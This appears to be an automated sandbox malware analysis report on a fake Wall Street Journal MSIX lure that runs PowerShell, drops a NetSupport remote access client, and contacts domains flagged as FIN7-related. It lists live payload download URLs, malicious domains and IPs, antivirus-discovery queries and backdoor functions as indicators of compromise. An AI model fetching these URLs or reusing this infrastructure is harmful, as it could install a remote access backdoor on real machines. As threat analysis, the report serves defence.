Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110F1070 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

32_2_110F1070

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1101D160 __time64,SetRect,GetLocalTime,

32_2_1101D160

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1103B170 _calloc,GetUserNameA,_free,_calloc,_free,

32_2_1103B170

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11171199 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

32_2_11171199

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_1109D240

AV process strings found (often used to terminate AV products)

Source: powershell.exe, 0000001A.00000002.2194762703.0000023179892000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	32_2_1106F200
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	32_2_110D5D90
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEBA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,	32_2_6BEBA980

Yara detected NetSupport remote tool

Source: Yara match	File source: 32.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.6c1b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.74670000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.powershell.exe.23162f37328.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.powershell.exe.23162f2d0d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.powershell.exe.2316336ecf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.111b32a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.6beb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1941488421.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2526275885.000000000270C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2526275885.0000000002700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2487651963.0000000000602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2496684032.0000000000827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\netsupport\client\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\client32.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\AudioCapture.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\netsupport\client\PCICL32.DLL, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.8.63.140	unknown	Russian Federation	30475	WEHOSTWEBSITES-COMUS	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
86.104.72.157	cdn37.space	Romania	50636	TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO	true
185.174.102.62	unknown	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
108.177.122.106	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
103.113.70.37	wsj.pm	India	133973	NETCONNECTWIFI-ASNetConnectWifiPvtLtdIN	false
104.26.13.205	unknown	United States	13335	CLOUDFLARENETUS	false
23.133.88.190	cdn40.click	Reserved	394352	FASTNET-COMMUNICATIONSCA	false
104.26.0.231	geo.netsupportsoftware.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.17

Contacted Domains

Name	IP	Active
geo.netsupportsoftware.com	104.26.0.231	true
cdn40.click	23.133.88.190	true
api.ipify.org	104.26.12.205	true
www.google.com	108.177.122.106	true
cdn37.space	86.104.72.157	true
wsj.pm	103.113.70.37	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geo.netsupportsoftware.com/location/loca.asp	false		high
https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn40.click/files/WSJ.msix	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wsj.pm/fonts/woffs/exchange/Exchange-BookItalic.woff2	false	Avira URL Cloud: safe	unknown
https://wsj.pm/fonts/woffs/retina/RetinaNarr-Medium.woff2	false	Avira URL Cloud: safe	unknown
https://wsj.pm/img/wsj-logo-big-black.e653dfca.svg	false	Avira URL Cloud: safe	unknown
https://wsj.pm/img/google-play.4699f3c2.svg	false	Avira URL Cloud: safe	unknown
https://cdn37.space/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b87	true	Avira URL Cloud: safe	unknown
https://cdn40.click/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c	false	Avira URL Cloud: safe	unknown
https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2	false	Avira URL Cloud: safe	unknown
https://wsj.pm/img/im-948848.jpeg	false	Avira URL Cloud: safe	unknown
https://wsj.pm/fonts/woffs/retina/Retina-Light.woff2	false	Avira URL Cloud: safe	unknown
https://wsj.pm/fonts/woffs/retina/RetinaNarr-Bold.woff2	false	Avira URL Cloud: safe	unknown
https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b87	false	Avira URL Cloud: safe	unknown
https://wsj.pm/fonts/woffs/retina/Retina-Book.woff2	false	Avira URL Cloud: safe	unknown
https://wsj.pm/style.css	false	Avira URL Cloud: safe	unknown
https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2	false	Avira URL Cloud: safe	unknown
https://wsj.pm/img/im-949675.png	false	Avira URL Cloud: safe	unknown
https://wsj.pm/fonts/woffs/retina/RetinaNarr-Light.woff2	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png8	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: cdn40.click	Virustotal: Detection: 5%			Perma Link
Source: http://pesterbdd.com/images/Pester.png8	Virustotal: Detection: 11%			Perma Link

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_110AC600

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\ProgramData\netsupport\client\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.28.14:443 -> 192.168.2.17:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.104.72.157:443 -> 192.168.2.17:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49807 version: TLS 1.2

Source:	Binary string: D:\a\1\s\x64\Release\PsfLauncher64.pdb source: PsfLauncher64.exe, 00000014.00000000.1745032807.00007FF6C367E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\s\x64\Release\PsfRuntime64.pdb source: PsfRunDll64.exe, 00000016.00000002.1749156584.00007FFA1B0EF000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2653892978.000000006C1B2000.00000002.00000001.01000000.00000019.sdmp, PCICHEK.DLL.26.dr
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 0000001A.00000002.1968531120.00000231631AF000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2639330298.000000006C0F1000.00000020.00000001.01000000.0000001A.sdmp, msvcr100.dll.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.26.dr
Source:	Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2654970934.0000000074675000.00000002.00000001.01000000.00000018.sdmp, pcicapi.dll.26.dr
Source:	Binary string: D:\a\1\s\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe, 00000016.00000000.1747207751.00007FF695D50000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: 0\1100\client32\Release\client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000001A.00000002.2187481682.00000231793A5000.00000004.00000020.00020000.00000000.sdmp

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	32_2_1102D1B3
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	32_2_11069760
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	32_2_11123690
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	32_2_11108090
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	32_2_110BC0E0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	32_2_1102CE84
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	32_2_11064EF0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2052006 ET TROJAN Suspected FIN7 Related domain in DNS Lookup (cdn37 .space) 192.168.2.17:53350 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2052014 ET TROJAN Suspected Fin7 Related Domain (cdn37 .space) in TLS SNI 192.168.2.17:49798 -> 86.104.72.157:443
Source: Traffic	Snort IDS: 2052014 ET TROJAN Suspected Fin7 Related Domain (cdn37 .space) in TLS SNI 192.168.2.17:49799 -> 86.104.72.157:443

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /files/netsupport25.zip HTTP/1.1Host: cdn37.space
Source: global traffic	HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.28.14
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.28.14
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.28.14
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93

